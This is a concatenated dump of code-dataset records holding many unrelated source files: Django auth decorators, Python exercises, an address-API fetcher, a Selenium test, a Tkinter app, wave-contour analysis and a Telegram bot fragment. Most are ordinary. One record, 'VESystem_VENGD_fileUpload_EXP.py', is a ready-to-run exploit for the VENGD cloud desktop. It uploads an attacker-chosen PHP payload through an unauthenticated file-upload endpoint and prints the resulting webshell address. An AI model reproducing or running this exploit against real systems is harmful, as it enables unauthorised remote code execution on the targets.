obtenerNombreSemestreActivo():\n semestreActivo=Semestre.getOne()\n s={}\n if semestreActivo != None:\n s['id_semestre'] = semestreActivo.id_semestre\n s['nombre'] = semestreActivo.nombre\n else:\n s['id_semestre'] =0\n s['nombre'] = '-'\n return s\n\ndef desactivarSemestre(idSemestre):\n m = Semestre().desactivar(idSemestre)\n return m","sub_path":"backend/app/controller/CTR_Mantenimiento.py","file_name":"CTR_Mantenimiento.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253644213","text":"from django.http import HttpResponse\nfrom django.template import RequestContext, loader\nimport django.contrib.auth.backends\nfrom ..settings import YEAR\nfrom .models import TutorProfile, Tutor, Rus\n\nclass NotTutor(Exception):\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\nclass TutorData:\n pass\n\ndef user_profile_data(user):\n d = TutorData()\n if user is None or not user.is_authenticated():\n raise NotTutor('failauth')\n if not user.is_active:\n raise NotTutor('djangoinactive')\n try:\n d.profile = user.get_profile()\n except TutorProfile.DoesNotExist:\n raise NotTutor('notutorprofile')\n return d\n\ndef user_tutor_data(user):\n d = user_profile_data(user)\n try:\n d.tutor = Tutor.members.get(profile=d.profile)\n except Tutor.DoesNotExist:\n raise NotTutor('notutoryear')\n return d\n\ndef user_rus_data(user):\n d = user_profile_data(user)\n try:\n d.rus = Rus.objects.get(profile=d.profile, year=YEAR)\n except Rus.DoesNotExist:\n raise NotTutor('norusyear')\n return d\n\ndef rusclass_required_error(request):\n t = loader.get_template('rusclass_required.html')\n c = RequestContext(request)\n return HttpResponse(t.render(c), status=403)\n\ndef tutorbest_required_error(request):\n t = loader.get_template('tutorbest_required.html')\n c = RequestContext(request)\n return HttpResponse(t.render(c), status=403)\n\ndef tutor_required_error(request):\n t = loader.get_template('tutor_required.html')\n c = RequestContext(request)\n return HttpResponse(t.render(c), status=403)\n\n# Decorator\ndef tutorbest_required(fn):\n def wrapper(request, *args, **kwargs):\n if request.user.is_superuser:\n return fn(request, *args, **kwargs)\n try:\n d = user_tutor_data(request.user)\n except NotTutor as e:\n return tutorbest_required_error(request)\n if not d.tutor.is_tutorbest():\n return tutorbest_required_error(request)\n return fn(request, *args, **kwargs)\n wrapper.__name__ = fn.__name__\n return wrapper\n\n# Decorator\ndef tutor_required(fn):\n def wrapper(request, *args, **kwargs):\n if request.user.is_superuser:\n return fn(request, *args, **kwargs)\n try:\n d = user_tutor_data(request.user)\n except NotTutor as e:\n return tutor_required_error(request)\n if not d.tutor.is_member():\n return tutor_required_error(request)\n import inspect\n namedargs, varargs, varkw, defaults = inspect.getargspec(fn)\n if varkw is not None or 'tutor' in namedargs:\n kwargs['tutor'] = d.tutor\n if varkw is not None or 'profile' in namedargs:\n kwargs['profile'] = d.profile\n return fn(request, *args, **kwargs)\n wrapper.__name__ = fn.__name__\n return wrapper\n\n# Decorator\ndef tutorbur_required(fn):\n def wrapper(request, *args, **kwargs):\n if request.user.is_superuser:\n return fn(request, *args, **kwargs)\n try:\n d = user_tutor_data(request.user)\n except NotTutor as e:\n return tutorbest_required_error(request)\n if not d.tutor.is_tutorbur():\n return tutorbest_required_error(request)\n return fn(request, *args, **kwargs)\n wrapper.__name__ = fn.__name__\n return wrapper\n\nclass SwitchUserBackend(django.contrib.auth.backends.ModelBackend):\n def authenticate(self, username, current_user):\n if not current_user.is_superuser:\n return None\n\n from django.contrib.auth.models import User\n\n try:\n return User.objects.get(username=username)\n except User.DoesNotExist:\n return None\n","sub_path":"mftutor/tutor/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286691490","text":"#adding numbers\n\nprint(\"This program adds 10 numbers together\")\ni=0 #counter for how many times in the loop it has run\n\nprint(\"Enter a number:\")\ndef get_input():\n number = input()\n try:\n number = int(number)\n return number\n except: #to check if the person entered the right numbers or to clear the input\n if(number==\"clear\"):\n print(\"Breaking current addition chain.\\nStarting new total. Total is 0\")\n add_number(0,0)\n print(\"You can only enter numbers.\")\n return get_input()\n\n\ndef add_number(total,number_of_loops):\n if(number_of_loops+1<=10):\n add_this = get_input()\n new_total = total + add_this\n print(\"New total is:\",new_total, \"Current numbers added is\",number_of_loops+1)\n add_number(new_total,number_of_loops+1)\n else:\n print(\"Starting new total. Total is 0\")\n add_number(0,0)\n\nadd_number(0,0)","sub_path":"JayRequizoCodeA/TEST/Adding 10 numbers together.py","file_name":"Adding 10 numbers together.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258383033","text":"from functools import reduce\nfrom random import randint\nfrom requests import get\n\nfrom api_keys import LOCU_API_KEY, YELLOWPAGES_API_KEY\n\nLOCU_KEYS = ('street_address', 'locality', 'region',\n 'postal_code', 'lat', 'long')\nLOCU_URL = 'https://api.locu.com/v1_0/venue/search/'\nTO_REPLACE = (('Northwest', 'NW'), ('Northeast', 'NE'),\n ('Southeast', 'SE'), ('Southwest', 'SW'), ('Drive', 'Dr'),\n ('Trail', 'Trl'), ('Landng', 'Landing'), ('Street', 'St'),\n (' - ', '-'), ('.', ''), (',', ''))\nYELLOW_URL = 'http://api.sandbox.yellowapi.com/FindBusiness/'\n\n\n# use re.sub() instead?\n# http://stackoverflow.com/questions/6116978/python-replace-multiple-strings\n\n# import re\n#\n# rep = {\"condition1\": \"\", \"condition2\": \"text\"} # desired replacements here\n#\n# # use these three lines to do the replacement\n# rep = dict((re.escape(k), v) for k, v in rep.iteritems())\n# pattern = re.compile(\"|\".join(rep.keys()))\n# text = pattern.sub(lambda m: rep[re.escape(m.group(0))], text)\n\n# # -------------------------------------------------------------\n# pattern = re.compile(\"|\".join(re.escape(k) for k in rep))\n# text = pattern.sub(lambda m: rep[m.group(0)], text)\n\n\ndef clean_street_address(address):\n return reduce(lambda a, kv: a.replace(*kv), TO_REPLACE, address).strip()\n\n\ndef locu_addresses(locality=''):\n payload = {\n 'api_key': LOCU_API_KEY,\n # 'location': '{}, {}'.format(latitude, longitude),\n 'locality': locality\n }\n\n r = get(LOCU_URL, params=payload)\n if r.status_code != 200:\n print('Locu - Response #: {}'.format(r.status_code))\n return []\n\n addresses = []\n for i, address in enumerate(r.json()['objects'], start=1):\n is_valid = True\n valid_address = []\n for key in LOCU_KEYS:\n current = address[key]\n if not current:\n is_valid = False\n break\n valid_address.append(current)\n if is_valid:\n valid_address[0] = clean_street_address(valid_address[0])\n addresses.append(valid_address)\n return addresses\n\n\ndef yellow_addresses(locality=''):\n \"\"\" SANDBOX API: 300 calls per day, 1 call per second MAXIMUM \"\"\"\n payload = {\n # pg = 1 - 50 # requested page\n 'what': 'business', # keyword, business name or phone number\n 'where': locality,\n # 'where': 'cZ51.03977045017534,-114.07616310273404',\n 'pgLen': 100, # total results per page, integer 1 - 100\n # 'dist' = 1 # positive decimal value | max distance within KM\n 'fmt': 'JSON', # output format, XML or JSON\n 'apikey': YELLOWPAGES_API_KEY,\n 'UID': randint(1, 4097)\n }\n r = get(YELLOW_URL, params=payload)\n if r.status_code != 200:\n print('Yellow - Response #: {}'.format(r.status_code))\n return []\n\n return [(\n clean_street_address(a['address']['street']),\n a['address']['city'],\n a['address']['prov'],\n a['address']['pcode'],\n a['geoCode']['latitude'],\n a['geoCode']['longitude']\n ) for a in r.json()['listings']]\n","sub_path":"yellowpages_locu.py","file_name":"yellowpages_locu.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191209251","text":"#!/usr/bin/python\n# Env: python3\n# Author: afei00123\n# -*- coding: utf8 -*-\n\nimport requests, urllib3, argparse\nfrom colorama import init\ninit(autoreset=True)\n\ndef title():\n print(\"\")\n print('*'.center(60, '*'))\n print(\"和信下一代云桌面VENGD(版本未知)\".center(40))\n print(\"github:https://github.com/ltfafei\".center(50))\n print(\"gitee:https://gitee.com/afei00123\".center(50))\n print(\"CSDN: afei00123.blog.csdn.net\".center(50))\n print(\"公众号:网络运维渗透\".center(40))\n print(\"\")\n print('*'.center(60, '*'))\n print(\"\")\n\ndef VENGD_RCE_EXP(url, payload):\n target_url = f\"{url}/Upload/upload_file.php?l=comm\"\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36\",\n \"accept\": \"image/avif,image/webp,image/apng,image/*,*/*;q=0.8\",\n \"Accept-Language\": \"zh-CN,zh; q=0.9, fil; q=0.8\",\n \"Cookie\": \"think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"close\",\n \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv\"\n }\n payload = f'''------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"comm.php\"\nContent-Type: image/avif\n\n{payload}\n------WebKitFormBoundaryfcKRltGv--'''\n try:\n state = requests.post(target_url, headers=headers, data=payload, timeout=2).status_code\n if state == 200:\n print(f\"[+] Webshell上传成功,Webshell地址:{url}/Upload/comm/comm.php\")\n except Exception as e:\n print(f\"[n] Webshell上传失败!\", e)\n exit()\n\nif(__name__ == \"__main__\"):\n title()\n parser = argparse.ArgumentParser(description=\"VESystem VENGD RCE EXP\")\n parser.add_argument(\n '-u', '--url', type=str, required='True',\n help='Please input target url. eg: https://ip:port'\n )\n parser.add_argument(\n '-p', '--payload', type=str, required='True',\n help='Please input content for upload. eg: '\n )\n args = parser.parse_args()\n VENGD_RCE_EXP(args.url, args.payload)","sub_path":"VESystem_VENGD_fileUpload_vuln/VESystem_VENGD_fileUpload_EXP.py","file_name":"VESystem_VENGD_fileUpload_EXP.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292070247","text":"from django.conf.urls import url\nfrom . import views\nfrom django.views.static import serve\nfrom django.conf import settings\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^([0-9])+/$', views.detail, name = 'detail'),\n url(r'^addevent/$', views.addevent, name = 'addevent'),\n url(r'^addevent/submitevent/$', views.submitevent, name = 'submitevent'),\n url(r'^user/(\\w+)/$', views.user_profile, name='user_profile'),\n url(r'^login/$', views.login_view, name='Login'),\n url(r'^logout/$', views.logout_view, name='Logout'),\n]\n\nif settings.DEBUG:\n urlpatterns += [\n url(r'^media/(?P.*)$', serve,\n {'document_root' : settings.MEDIA_ROOT,}),\n ]\n","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275603827","text":"# -*- coding:UTF-8 -*-\nimport time\n\nimport retrying\nfrom selenium.common.exceptions import TimeoutException\n\nfrom base.abtemplate import AbTemplate, retry_if_timeout_exception\nfrom page import contractmanage, contractdetail\nfrom util import urldata\n\n\n# from page import xxx\n\nclass OMS(AbTemplate):\n # case info\n contract_id_value = \"1030190715361380\"\n\n # page info\n contract_manage_page = contractmanage.contactManagePage()\n contract_detail_page = contractdetail.ContactDetailPage()\n\n @retrying.retry(retry_on_exception=retry_if_timeout_exception, stop_max_attempt_number=2)\n def test_case(self):\n self.util_init(__file__)\n self.testcaseinfo.starttime = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n if self.flag > 1:\n self.setUp()\n try:\n self.step = \"convert to contract manage page\"\n self.logger.info(self.step)\n self.convert_to_url(urldata.URLData().get_contract_manage_url())\n self.wait_url_to_be(urldata.URLData().get_contract_manage_url())\n\n self.step=\"select company\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_manage_page.contract_id_box)\n self.Select(self.contract_manage_page.select_company,self.contract_manage_page.company_value)\n\n self.step = \"fill contract\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_manage_page.contract_id_box)\n self.fill(self.contract_manage_page.contract_id_box, self.contract_id_value)\n\n self.step = \"click query\"\n self.logger.info(self.step)\n self.click(self.contract_manage_page.query_contact_button)\n\n self.step = \"click contract\"\n self.logger.info(self.step)\n self.wait_clickable(self.contract_manage_page.contract_id_link)\n self.click(self.contract_manage_page.contract_id_link)\n self.driver.close()\n self.switch_handel()\n\n self.step = \"click anthorize log\"\n self.logger.info(self.step)\n self.wait_clickable(self.contract_detail_page.contractYeeuuBtn_button)\n self.click(self.contract_detail_page.contractYeeuuBtn_button)\n\n self.step = \"fill start datetime\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_detail_page.yeeuuStart_box)\n self.fill(self.contract_detail_page.yeeuuStart_box, self.contract_detail_page.yeeuu_start_value)\n\n self.step = \"fill end datetime\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_detail_page.yeeuuStart_box)\n self.fill(self.contract_detail_page.yeeuuEnd_box, self.contract_detail_page.yeeuu_end_value)\n\n self.step = \"click confirm\"\n self.logger.info(self.step)\n self.click(self.contract_detail_page.yeeuu_confirm)\n\n self.step = \"validate is authorize log page\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_detail_page.authorize_info)\n anthorize_info = self.get_text_Infor(self.contract_detail_page.authorize_info)\n self.assertEquals(\"授权记录\", anthorize_info, \"页面跳转失败\")\n\n self.testcaseinfo.result = \"Pass\"\n pass\n except TimeoutException:\n self.timeout_method()\n except Exception as err:\n self.exception_method(err)\n finally:\n self.finally_method()\n","sub_path":"testcaseunit/contract_manage_moudel/oms272_contract_anthorize_log.py","file_name":"oms272_contract_anthorize_log.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"15920875","text":"def main():\n \n x = int(input('Introduce un número: '))\n \n if x>0 and x%2 == 0:\n return(\"El número es par positivo\")\n elif x>0 and x%2 != 0:\n return(\"El número es impar positivo\")\n elif x<0 and x%2 == 0:\n return(\"El número es par negativo\")\n elif x<0 and x%2 != 0:\n return(\"El número es impar negativo\")\n else:\n return(\"El 0 no es par ni impar\")\n\nif __name__ == '__main__':\n print(main())\n","sub_path":"ActClase7/ej1 pares - juntos.py","file_name":"ej1 pares - juntos.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"565909750","text":"import datetime\nimport math\n\n\ndef e1(num):\n \"\"\"\n 求100内的素数\n :return: 数组\n\n \"\"\"\n arr = []\n for i in range(2, num + 1):\n flag = True\n for j in range(2, i // 2 + 1):\n if i % j == 0:\n flag = False\n break\n if flag:\n arr.append(i)\n return arr\n\n\ndef e1_1(num):\n \"\"\"\n 求100内的素数\n :return: 数组\n \"\"\"\n arr = []\n flag = True\n for x in range(2, num):\n for i in arr:\n if x % i == 0:\n flag = False\n break\n if i >= math.ceil(math.sqrt(x)):\n flag = True\n break\n if flag:\n arr.append(x)\n return arr\n\n\ndef e2(n):\n \"\"\"\n 计算杨辉三角前n行\n :param n:\n :return:\n \"\"\"\n triangle = []\n if n >= 1:\n triangle.append([1])\n if n >= 2:\n triangle.append([1, 2])\n for i in range(2, n):\n cur = [1]\n pre = triangle[i - 1]\n for j in range(len(pre) - 1):\n cur.append(pre[j] + pre[j + 1])\n cur.append(1)\n triangle.append(cur)\n return triangle\n\n\ndef e3(matrix):\n \"\"\"\n 给定任何一个矩阵,求转置矩阵\n 1 2 3 1 4\n 4 5 6 ==> 2 5\n 3 6\n :param matrix:\n :return:\n \"\"\"\n tm = []\n count = 0\n for row in matrix:\n for i, col in enumerate(row):\n if len(tm) < i + 1:\n tm.append([])\n tm[i].append(col)\n count += 1\n return tm\n\n\ndef e3_1(matrix):\n \"\"\"\n 给定任何一个矩阵,求转置矩阵\n 1 2 3 1 4\n 4 5 6 ==> 2 5\n 3 6\n :param matrix:\n :return:\n \"\"\"\n tm = [[0 for col in range(len(matrix))] for row in range(len(matrix[0]))]\n count = 0\n for i, row in enumerate(tm):\n for j, col in enumerate(row):\n tm[i][j] = matrix[j][i]\n count += 1\n return tm\n\n\nif __name__ == \"__main__\":\n # print(e1(100))\n # print(e1_1(100))\n\n print(e2(6))\n\n matrix = [[1, 2, 3, 5, 9, 5434], [4, 5, 6, 1, 123, 555], [3, 3, 4, 4, 5, 5]]\n\n start = datetime.datetime.now()\n print(e3(matrix))\n p1 = datetime.datetime.now()\n\n print(e3_1(matrix))\n p2 = datetime.datetime.now()\n print(\"method 1: \" + str(p1.timestamp() - start.timestamp()))\n print(\"method 2: \" + str(p2.timestamp() - p1.timestamp()))\n","sub_path":"base/chapter02-datastructures/01-list.py","file_name":"01-list.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"650662370","text":"import Tkinter as tk\r\nfrom Tkinter import *\r\nimport ttk\r\nfrom tkSearch import *\r\nfrom tkDelete import *\r\n\r\nb = \"Busqueda\"\r\nt1 = \"Keyword\"\r\nt2 = \"Usuario\"\r\nt3 = \"Procesos\"\r\nprocesses = []\r\n\r\n#Main window\r\nclass TwitterApp(tk.Tk):\r\n def __init__(self, *args, **kwargs):\r\n tk.Tk.__init__(self, *args, **kwargs)\r\n\r\n #Title inside window on top\r\n self.topLabel = tk.Label(self, text = \"Twitter App\")\r\n self.topLabel.pack()\r\n\r\n #Tab interface\r\n self.tab = ttk.Notebook(self)\r\n \r\n #Adding titles to tabs\r\n titles = [b, t3]\r\n self.frames = {}\r\n for title in titles:\r\n self.frames[title] = ttk.Frame(self.tab)\r\n self.tab.add(self.frames[title], text = title)\r\n\r\n #Frame for search\r\n self.searchKey = toSearch(self.frames[b], b, self)\r\n self.searchKey.pack()\r\n\r\n #Frame for list of processes\r\n self.deleteList = toDelete(self.frames[t3], self)\r\n self.deleteList.pack()\r\n \r\n self.tab.pack()\r\n \r\n\r\napp = TwitterApp()\r\napp.title(\"Twitter App\")\r\napp.geometry('565x330')\r\napp.mainloop()\r\n \r\n","sub_path":"App/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475989239","text":"import numpy as np\nimport WDRT.ESSC as ESSC\nimport copy\nimport os \nimport matplotlib.pyplot as plt\n\n# Create buoy object, in this case for Station #46022\nbuoy46022 = ESSC.Buoy('46022', 'NDBC')\n\n# Read data from ndbc.noaa.gov\n#buoy46022.fetchFromWeb()\n#buoy46022.saveAsTxt(savePath = \"./Data\")\n#buoy46022.saveAsH5('NDBC46022.h5')\n\n# Load data from .txt file if avilable\n#buoy46022.loadFromTxt(r'C:\\full\\filepath\\to\\WDRT\\examples\\data\\NDBC46022')\n\n# Load data from .h5 file if available\ndataPath = os.path.join('data', 'NDBC46022.h5')\nbuoy46022.loadFromH5(dataPath)\n\n# Declare required parameters\nTime_SS = 1. # Sea state duration (hrs)\nTime_R = 100 # Return periods (yrs) of interest\n\n# Create PCA EA object for the buoy\npca46022 = ESSC.PCA(buoy46022)\n\n# Calculate contour using PCA method\npca_Hs_Return, pca_T_Return = pca46022.getContours(Time_SS, Time_R)\n\n# Show a plot of the data\npca46022.plotData()\n\n# Sample Generation Example\nnum_contour_points = 20 # Number of points to be sampled for each\n# contour interval.\ncontour_returns = np.array([0.001, 0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100])\n# Probabilities defining sampling contour bounds.\nrandom_seed = 2 # Random seed for sample generation\n\n# Get samples for a full sea state long term analysis\nHs_sampleFSS, T_sampleFSS, Weight_sampleFSS = pca46022.getSamples(num_contour_points,\n contour_returns, random_seed)\n# Get samples for a contour approach long term analysis\nT_sampleCA = np.arange(12, 26, 2)\nHs_sampleCA = pca46022.getContourPoints(T_sampleCA)\n\n# Save data in h5 file\n#pca46022.saveContour(r'C:\\full\\filepath\\to\\WDRT\\examples\\NDBC%s' % (pca46022.buoy.buoyNum))\n#pca46022.saveContour(r'testNDBC%s' % (pca46022.buoy.buoyNum))\npca46022.saveContour(r'data\\example_envSampleNDBC%s' % (pca46022.buoy.buoyNum))\n\n# Create EA objects for remaining contour methods\nGauss46022 = ESSC.GaussianCopula(buoy46022)\nGumbel46022 = ESSC.GumbelCopula(buoy46022)\nClayton46022 = ESSC.ClaytonCopula(buoy46022)\nrosen46022 = ESSC.Rosenblatt(buoy46022)\nNonParaGauss46022 = ESSC.NonParaGaussianCopula(buoy46022)\nNonParaClay46022 = ESSC.NonParaClaytonCopula(buoy46022)\nNonParaGum46022 = ESSC.NonParaGumbelCopula(buoy46022)\nBivariateKDE46022 = ESSC.BivariateKDE(buoy46022, bw = [0.23, 0.23], logTransform = False)\nBivariateLogKDE46022 = ESSC.BivariateKDE(buoy46022, bw = [0.02, 0.11], logTransform = True)\n\n# Calculate contours for all remaining contour methods\nGauss_Hs_Return, Gauss_T_Return = Gauss46022.getContours(Time_SS, Time_R)\nGumbel_Hs_Return, Gumbel_T_Return = Gumbel46022.getContours(Time_SS, Time_R)\nClayton_Hs_Return, Clayton_T_Return = Clayton46022.getContours(Time_SS, Time_R)\nrosen_Hs_Return, rosen_T_Return = rosen46022.getContours(Time_SS, Time_R)\nNonParaGau_Hs_Return, NonParaGau_T_Return = NonParaGauss46022.getContours(Time_SS, Time_R)\nNonParaClay_Hs_Return, NonParaClay_T_Return = NonParaClay46022.getContours(Time_SS, Time_R)\nNonParaGum_Hs_Return, NonParaGum_T_Return = NonParaGum46022.getContours(Time_SS, Time_R)\nKDE_Hs_Return, KDE_T_Return = BivariateKDE46022.getContours(Time_SS, Time_R)\nlogKDE_Hs_Return, logKDE_T_Return = BivariateLogKDE46022.getContours(Time_SS, Time_R)\n\n# Plot all contour results for comparison\nf = plt.figure()\nf.canvas.set_window_title('NDBC%s, %i-year contours' % (buoy46022.buoyNum, Time_R))\nplt.plot(buoy46022.T, buoy46022.Hs, 'bo', alpha=0.1, label='Data')\nplt.plot(pca_T_Return, pca_Hs_Return, '-', label='PCA')\nplt.plot(Gauss_T_Return, Gauss_Hs_Return, '-', label='Gaussian')\nplt.plot(Gumbel_T_Return, Gumbel_Hs_Return, '-', label='Gumbel')\nplt.plot(Clayton_T_Return, Clayton_Hs_Return, '-', label='Clayton')\nplt.plot(rosen_T_Return, rosen_Hs_Return, '-', label='Rosenblatt')\nplt.plot(NonParaGau_T_Return, NonParaGau_Hs_Return, 'g--', label='Non-Parametric Gaussian')\nplt.plot(NonParaGum_T_Return, NonParaGum_Hs_Return, 'r--', label='Non-Parametric Gumbel')\nplt.plot(NonParaClay_T_Return, NonParaClay_Hs_Return, 'c--', label='Non-Parametric Clayton')\nplt.plot(KDE_T_Return, KDE_Hs_Return, 'm--', label = 'Bivariate KDE')\nplt.plot(logKDE_T_Return, logKDE_Hs_Return, 'b--', label = 'Bivariate KDE (log)')\nplt.xlabel('Energy period, $T_e$ [s]')\nplt.ylabel('Sig. wave height, $H_s$ [m]')\nplt.grid(True)\nplt.legend(loc='center right', bbox_to_anchor=(1.4,0.5),fontsize=10, fancybox=True)\nplt.show()\n\n\n# Modify contour by steepness curve if they intersect\n# Declare required parameters\ndepth = 391.4 # Depth at measurement point (m)\nSteepMax = 0.07 # Optional: enter estimate of breaking steepness\nT_vals = np.arange(0.1, np.amax(buoy46022.T), 0.1)\n\n#Note, if depth is not inputted manually, it will automatically be retrieved from NDBC's website\nSteepH = pca46022.steepness(SteepMax, T_vals,depth = depth)\nSteepH_Return = pca46022.steepness(SteepMax, pca46022.T_ReturnContours, depth = depth)\n\nSteep_correction = np.where(SteepH_Return < pca46022.Hs_ReturnContours)\nHs_Return_Steep = copy.deepcopy(pca46022.Hs_ReturnContours)\nHs_Return_Steep[Steep_correction] = SteepH_Return[Steep_correction]\n\npca46022.plotSampleData()\n\n# Take a subset of 10 years of data and calculate a 20-year contour using the subset\nTime_R = 20\nsubsetBuoy = buoy46022.createSubsetBuoy(10)\nsubsetPCA = ESSC.PCA(subsetBuoy)\nSubset_Hs_Return, Subset_T_Return = subsetPCA.getContours(Time_SS, Time_R)\n\n# Plot contour and subsetted data\nf = plt.figure()\nf.canvas.set_window_title('NDBC%s, %i-year contours' % (subsetBuoy.buoyNum, Time_R))\nplt.plot(subsetBuoy.T, subsetBuoy.Hs, 'bo', alpha=0.1, label='Data')\nplt.plot(Subset_T_Return, Subset_Hs_Return, '-', label = 'PCA')\nplt.xlabel('Energy period, $T_e$ [s]')\nplt.ylabel('Sig. wave height, $H_s$ [m]')\nplt.grid(True)\nplt.legend(loc='center right', bbox_to_anchor=(1.4,0.5),fontsize=10, fancybox=True)\nplt.show()\n\n# Determine which buoy observations are outside of the contour\noutsideT, outsideHs = subsetPCA.outsidePoints()\n\n# Determine the area of the contour\nsubsetPCAArea = subsetPCA.contourIntegrator()\n\n# Calculate bootstrap confidence intervals, commented out due to long run time\n# Note that stable bootstrap confidence intervals require large sample sizes\n# pca46022.bootStrap(boot_size=10)\n# Gauss46022.bootStrap(boot_size=10)\n# Gumbel46022.bootStrap(boot_size=10)\n# cc46022.bootStrap(boot_size=10)\n# rosen46022.bootStrap(boot_size=10)\n# NonParaGauss46022.bootStrap(boot_size=10)\n# NonParaGauss46022.bootStrap(boot_size=10)\n# NonParaGauss46022.bootStrap(boot_size=10)\n\n\n","sub_path":"examples/example_envSampling.py","file_name":"example_envSampling.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"587973810","text":"import numpy as np\nimport pandas as pd\nfrom nolearn.dbn import DBN\n###############################################################################\n# Load Data\nX_train=pd.read_csv('scikit_train_features.csv',header=None).values\nY_train=np.ravel(pd.read_csv('scikit_train_labels.csv',header=None).values)\nX_test =pd.read_csv('scikit_test.csv',header=None).values\nclf = DBN(\n[X_train.shape[1], 2000,1000,350,-1],\nlearn_rates=0.25,\nlearn_rate_decays=0.9,\nlearn_rates_pretrain=0.005,\nepochs=300,\nverbose=1,)\nclf.fit(X_train, Y_train)\nsubm= clf.predict(X_test)\ndataset=pd.Series(subm)\ndataset.index= np.arange(1, len(dataset)+1)\ndataset.to_csv('scikit_results2_NN.csv',header=['Solution'],index_label='Id')\n","sub_path":"scikit_learn_NN.py","file_name":"scikit_learn_NN.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"311596955","text":"from tkinter import Canvas, Frame, BOTH\n\nclass Example(Frame):\n \n def __init__(self,root,x,y,incidence,ne):\n super().__init__()\n self.root=root\n self.x=x\n self.y=y\n self.incidence=incidence\n self.ne=ne\n\n #self.initUI()\n self.drawLines()\n \n\n def initUI(self):\n\n self.root.title(\"Lines\")\n self.pack(fill=BOTH, expand=1)\n\n canvas = Canvas(self)\n canvas.create_line(15, 25, 200, 25)\n canvas.create_line(300, 35, 300, 200, dash=(4, 2))\n canvas.create_line(55, 85, 155, 85, 105, 180, 55, 85)\n\n canvas.pack(fill=BOTH, expand=1)\n \n def drawLines(self) :\n self.root.title(\"Lines2d\")\n self.pack(fill=BOTH, expand=1)\n canvas=Canvas(self.root, width=300, height=200)\n canvas.pack()\n #print('2DLines')\n canvas.create_line(300, 35, 300, 200, dash=(4, 2))\n i=0\n while i < self.ne :\n \n canvas.create_line(self.x[self.incidence[i][0]],self.y[self.incidence[i][0]],self.x[self.incidence[i][1]],self.y[self.incidence[i][1]])\n i +=1\n canvas.pack(fill=BOTH, expand=1) ","sub_path":"wire3d_mod.py","file_name":"wire3d_mod.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533153323","text":"from app import create_app, db\nfrom app.models import User, Course, Review\n\napp = create_app()\n\n@app.shell_context_processor\ndef make_shell_context():\n return dict(app=app,\n db=db,\n User=User,\n Course=Course,\n Review=Review)\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"623307340","text":"import logging\nimport text\nimport json\nfrom mongodb import mongo_get_index, mongo_receive_cities\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, ParseMode\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, Updater, CallbackQueryHandler\nimport emojis\nimport math\n\n# Global variables\n_cached_city = \"Киев\"\n_cached_city_page = 1\n\n_cached_index_page = 1\n_cached_index_dict = {}\n\ndef get_token():\n with open(\"config.json\", \"r\") as config:\n config = json.loads(config.read())\n token = str(config['token'])\n return token\n\n\n# Basic logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n# Interaction with Mongo Functions\n# TODO: Needs to be separated in the future\ndef construct_cities_list(cities_list, page_num):\n keyboard = []\n list_len = len(cities_list)\n buttons_per_page = 5\n if list_len <= buttons_per_page:\n for city in cities_list:\n keyboard.append([InlineKeyboardButton(str(city), callback_data=str(city))])\n\n else:\n # compute first and last indexes\n last_index = page_num * buttons_per_page\n first_index = last_index - buttons_per_page\n\n # extract the cities for the page\n page_list = cities_list[first_index:last_index]\n\n # add cities\n for city in page_list:\n keyboard.append([InlineKeyboardButton(str(city), callback_data=str(city))])\n\n # add 